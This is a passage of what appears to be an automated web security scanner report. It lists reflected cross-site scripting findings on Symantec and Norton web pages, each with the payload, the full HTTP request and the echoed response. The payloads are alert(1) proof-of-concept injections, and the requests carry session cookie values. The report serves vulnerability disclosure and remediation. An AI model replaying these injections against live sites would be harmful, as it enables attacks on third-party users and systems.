HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:38 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: Servlet/3.0; JBossAS-6 Content-Length: 1328 Connection: close Content-Type: text/html;charset=ISO-8859-1 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <!-- so that relative references will use absolute url from jsp and not from calling ...[SNIP]... <br/> QUERY:11807--><script>alert(1)</script>5053ee4c92a =1 <br/>...[SNIP]...
3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://renewals.symantec.com
Path:
/renewals/application
Issue detail
The value of the entry_point request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96f20"%3balert(1)//6e6ee0889dd was submitted in the entry_point parameter. This input was echoed as 96f20";alert(1)//6e6ee0889dd in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd &inid=us_pagenotfound_smb_store HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:32:03 GMT Content-Type: text/html; charset=utf-8 Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(1)//6e6ee0889dd&inid=us_pagenotfound_smb_store Content-Length: 21464 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <!-- BEGIN ...[SNIP]... = "null"; var cookieDays = 20; var idVisitor = "null"; if (idVisitor != "null") { s_2.visitorID = idVisitor; s_2.visitorID = s_2.visitorID.replace("-", "_hyphen_"); } s_2.campaign="WEB_sym_lrc96f20";alert(1)//6e6ee0889dd "; if (s_2.campaign == "null") s_2.campaign = "WEB"; s_2.currency="USD"; var friendlyEvents = ""; if (emailSent == "Y") { if (s_2.campaign != "null") { var r_email = s_2.getValOnce(s_2.campa...[SNIP]...
3.26. http://updatecenter.norton.com/ [NUCLANG parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://updatecenter.norton.com
Path:
/
Issue detail
The value of the NUCLANG request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 was submitted in the NUCLANG parameter. This input was echoed as 5366c"style="x:expression(alert(1))"0c17ca574c1 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?NUCLANG=en5366c"style%3d"x%3aexpression(alert(1))"0c17ca574c1 HTTP/1.1 Host: updatecenter.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 ETag: "" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 09 Sep 2011 21:46:07 GMT Connection: close Content-Length: 25501 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir = "ltr"> <head id="ctl00_Head1"><t...[SNIP]... <input type="hidden" id="LangSelected" value="en5366c"style="x:expression(alert(1))"0c17ca574c1 " />...[SNIP]...
3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/business/verisign/fraud-detection-service
Issue detail
The value of the tid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ed59"><script>alert(1)</script>0e8182bf4be was submitted in the tid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/verisign/fraud-detection-service?tid=gnps6ed59"><script>alert(1)</script>0e8182bf4be HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 54792 Cache-Control: public, max-age=3563 Date: Fri, 09 Sep 2011 21:31:23 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Risk-Based Authentication, Fraud Detection, Identity Theft Protection - Veri...[SNIP]... <meta name="om.page_name" content="en/us: biz: products: overview: information risk & compliance: verisign identity protection fraud detection service: gnps6ed59"><script>alert(1)</script>0e8182bf4be "/>...[SNIP]...
3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2722'-alert(1)-'9a6003db3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sitesc2722'-alert(1)-'9a6003db3b /default/themes/connect2/images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:34:22 +0000 Vary: Cookie ETag: "1315604062" Content-Type: text/html; charset=utf-8 Content-Length: 29479 X-Varnish: 1369354182 X-Varnish-Cache: MISS Vary: Accept-Encoding Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:34:22 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <script type="text/javascript"> var symaccount_target_url = 'https://www-secure.symantec.com/connect/sitesc2722'-alert(1)-'9a6003db3b /default/themes/connect2/images/favicon.ico'; var symaccount_base_url = 'https://symaccount.symantec.com/'; var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1'; </script>...[SNIP]...
3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ee12'-alert(1)-'de74577dedc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default4ee12'-alert(1)-'de74577dedc /themes/connect2/images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:34:27 +0000 Vary: Cookie ETag: "1315604067" Content-Type: text/html; charset=utf-8 Content-Length: 29480 X-Varnish: 1921330105 X-Varnish-Cache: MISS Vary: Accept-Encoding Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:34:28 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <script type="text/javascript"> var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default4ee12'-alert(1)-'de74577dedc /themes/connect2/images/favicon.ico'; var symaccount_base_url = 'https://symaccount.symantec.com/'; var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1'; </script>...[SNIP]...
3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ecbc'-alert(1)-'1d8cd1c6f5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f /connect2/images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:34:33 +0000 Vary: Cookie ETag: "1315604073" Content-Type: text/html; charset=utf-8 Content-Length: 29480 X-Varnish: 1921330192 X-Varnish-Cache: MISS Vary: Accept-Encoding Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:34:34 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <script type="text/javascript"> var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes6ecbc'-alert(1)-'1d8cd1c6f5f /connect2/images/favicon.ico'; var symaccount_base_url = 'https://symaccount.symantec.com/'; var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1'; </script>...[SNIP]...
3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc09'-alert(1)-'d98c9c18875 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875 /images/favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:34:39 +0000 Vary: Cookie ETag: "1315604079" Content-Type: text/html; charset=utf-8 Content-Length: 29480 X-Varnish: 1921330249 X-Varnish-Cache: MISS Vary: Accept-Encoding Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:34:39 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <script type="text/javascript"> var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2bdc09'-alert(1)-'d98c9c18875 /images/favicon.ico'; var symaccount_base_url = 'https://symaccount.symantec.com/'; var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1'; </script>...[SNIP]...
3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55f45'-alert(1)-'cc1ecd4f4c2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2 /favicon.ico HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:34:45 +0000 Vary: Cookie ETag: "1315604085" Content-Type: text/html; charset=utf-8 Content-Length: 29481 X-Varnish: 1369354450 X-Varnish-Cache: MISS Vary: Accept-Encoding Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:34:45 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <script type="text/javascript"> var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images55f45'-alert(1)-'cc1ecd4f4c2 /favicon.ico'; var symaccount_base_url = 'https://symaccount.symantec.com/'; var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1'; </script>...[SNIP]...
3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/sites/default/themes/connect2/images/favicon.ico
Issue detail
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be710'-alert(1)-'6137fcbfa0a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:34:52 +0000 Vary: Cookie ETag: "1315604092" Content-Type: text/html; charset=utf-8 Content-Length: 29481 X-Varnish: 1369354548 X-Varnish-Cache: MISS Vary: Accept-Encoding Cache-Control: public, max-age=1794 Date: Fri, 09 Sep 2011 21:34:52 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <script type="text/javascript"> var symaccount_target_url = 'https://www-secure.symantec.com/connect/sites/default/themes/connect2/images/favicon.icobe710'-alert(1)-'6137fcbfa0a '; var symaccount_base_url = 'https://symaccount.symantec.com/'; var symaccount_li_cookie = 'lifb1d8525d94d660bc8f92b8419fd5ae1'; </script>...[SNIP]...
